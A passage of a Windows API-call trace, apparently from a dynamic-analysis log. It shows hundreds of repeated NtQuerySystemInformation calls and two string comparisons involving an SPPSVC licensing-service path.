(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x20, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0217.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0217.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0217.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0217.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0217.384] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0217.395] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0217.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0217.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 